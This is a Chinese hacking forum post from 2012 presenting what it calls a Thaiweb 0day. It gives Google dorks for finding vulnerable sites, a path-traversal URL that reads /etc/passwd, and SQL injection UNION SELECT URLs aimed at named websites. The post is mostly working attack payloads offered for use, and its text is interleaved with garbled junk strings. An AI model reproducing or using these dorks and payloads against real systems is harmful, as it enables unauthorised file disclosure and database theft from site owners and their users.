找回密码
 立即注册
查看: 2875|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
/ Q1 B9 @5 Y* ^. i% M/ D9 i5 a3 U" ~( ~% m
intext:powered by Thaiweb3 g9 ~# @+ q1 @! Z, }
; \8 T4 Q6 Z! R- u" l; ?$ R
inurl:index.php?page=board.php
* i+ w; S) t7 o
8 ?7 n8 L$ p- l: P8 h# q' n; b' G! n& l
1 ^6 V5 ]- Q' E! l) _5 i) K( f  G7 ?/ i# w
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
/ ~- |( m1 Q* E" l# b
$ f) J8 H% r$ p) T* P : r) r+ ?2 E8 t! h* M3 `* K
( g$ [7 c; h! p4 I% Z; o
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4': i: b" J& R, X7 z4 l0 m

6 `' d/ j, s- k9 F% e. F7 t
2 ~) H. ~* j% i% ]& L
$ e* M" x7 ]2 f0 c- F9 T# Dhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--4 O9 V$ E7 _8 ~4 g' e' M1 A  @/ e3 X
) Y6 D7 x; S/ d, h; R
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--& m7 l: |6 P* g
0 X2 S! j0 k& C2 b& i
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
7 T2 w; E  `# h' k( v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表